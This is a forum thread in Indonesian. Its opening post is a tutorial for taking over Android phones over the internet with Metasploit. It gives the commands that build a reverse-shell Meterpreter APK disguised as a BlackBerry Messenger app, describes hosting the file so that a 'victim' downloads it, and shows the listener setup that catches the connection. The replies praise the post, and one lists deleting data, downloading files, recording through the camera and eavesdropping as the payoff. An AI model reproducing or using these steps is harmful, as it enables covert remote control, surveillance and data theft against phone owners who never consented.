[Share] Exploit Android Meterpreter IP Public
#1
Selamat siang rekan-rekan sekalian Big Grin
kali ini saya akan share bagaimana cara mengexploit handphone, tablet atau apapun yang menggunakan Android. sebelumnya saya minta maaf karena postingan saya kali ini hanya menyempurnakan thread dari om @larcenciels
Quote:http://indonesianbacktrack.or.id/forum/thread-5101.html
di thread om @larcenciels di jelaskan hanya untuk satu jaringan saja dan ss juga tidak terlihat Big Grin
kali ini saya akan mengshare bagaimana kita bisa mengexploit android dengan ip publik.
ok pertama yang kita butuhkan ada MSFCONSOLE dan tentunya kita terhubung dengan ip publik. bisa menggunakan wifi, jaringan speedy, atau jaringan lainnya.

tapi kali ini saya akan langsung mengexploit menggunakan komputer server. karena saya tidak punya ip publik. maklum anak kost pakenya gratisan =))
kita bisa menggunakan VPS dengan syarat dalam VPS tersebut sudah terinstal METASPLOIT. bagaimana cara instal msfconsole di komputer server?
saya sebelumnya sudah membuat thread tentang bagaimana cara menginstal metasploit di komputer server
Quote:http://indonesianbacktrack.or.id/forum/thread-5522.html

ok langsung saja, pertama saya akan mengkoneksikan pc saya ke pc server melalui ssh. saya langsung di terminal, kalau pakai windows, bisa pakai putty, bitvise atau apapun :-bd
[Image: 1520725_717328968277407_923363840_n.jpg]
wkwkwkk konekin sshnya aja harus pake proxychains =))

ok, langsung saja, bagi yang punya ip publik langsung dari pc masing" saja sudah bisa Big Grin
langsung buat payloadnya dengan cara
Code:
msfpayload android/meterpreter/reverse_tcp LHOST=ip publik LPORT=123 R > BBMForAndroid.apk
Quote:LHOST= di isi dengan ip publik anda sendiri
nama aplikasi bisa di ganti sesuai keinginan anda masing-masing, dan gunakan ekstensi .apk agar bisa di eksekusi oleh android
[Image: 1525630_717329004944070_1811949333_n.jpg]

setelah jadi, pindahkan atau copy file tersebut ke directory /var/www agar bisa di download langsung oleh korban. atau bisa di upload ke mediafire atau semacamnya
[Image: 1016615_717329011610736_1926500536_n.jpg]
Quote:korban bisa mendownload file payload yang kita buat tadi dengan mengakses link ipPublic/namaAplikasi.apk. contoh punya saya 103.23.xxx.xx/BBMForAndroid.apk

setelah itu, kita bisa membuka msfconsole kita
dan pastikan bahwa msfconsole kita sudah update yang terbaru karena yang lama belum ada modul android meterpreter.
[Image: 1512564_717329674944003_2128045508_n.jpg]


lalu kita bisa mengeksekusinya dengan:
Code:
use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set lhost ip publik
    set lport 123
    exploit
[Image: 1531629_717329388277365_734355370_n.jpg]

kita tinggal menunggu korban membuka file yang kita buat tadi. setelah dia membuka file yang kita buat tadi maka akan muncul penampakan seperti ini
[Image: 1512504_717329518277352_1015988583_n.jpg]
taraaa kita masuk ke meterpreter =))

tinggal sesuka hati saja kita mau apakan android tersebut \m/
[Image: 1517456_717329604944010_1693111940_n.jpg]

sekian dari saya, apabila kurang berkenan saya mohon maaf Smile
semoga bermanfaat \m/
Information Is The Most Dangerous Weapon In The World

#2
manteb son (y)
ngesuk di jajal maning lah

#3
@hackimripper besok try something new dong =))

#4
weeeww keereeeenn om (y)
makin cakep aja Big Grin Big Grin Big Grin

ane kasi ijo-ijo yaa om hehehe.. Big Grin Big Grin Big Grin

#5
hehehe, makasih om @C.S$ sering" aja ngasih cendolnya Big Grin

#6
hkhkhkhk iyaaa om.. nnti z kasi es cendol hahahahah Big Grin Big Grin

es cendol special makassar hahahahaha
Big Grin Big Grin

#7
wwoooww nice share om.., keren abis dahh..

#8
@sonyrimawan buset dah. =)) dapet vpsnya darimana beroo? wekakwekakwakwa. bagi dong Big Grin

#9
kita bisa apa saja setelah kita masuk meterpreter?

kita bisa apa saja setelah kita masuk meterpreter?

#10
@Abdul Khaliq thanks om. semoga bermanfaat Big Grin
@alkaaf bahh =)) ini server punya kampus ane sendiri om Big Grin kagak boleh di bagi" =))
@./terrorattack setelah masuk meterpreter ibarat kita udah pegang hapenya sendiri om, kita bisa melakukan apa saja dengan android tersebut. mau di hapus, mau di download datanya, mau ngrekam lewat kamera, mau nyadap isi hapenya itu sesuka hati om Big Grin





Users browsing this thread: 1 Guest(s)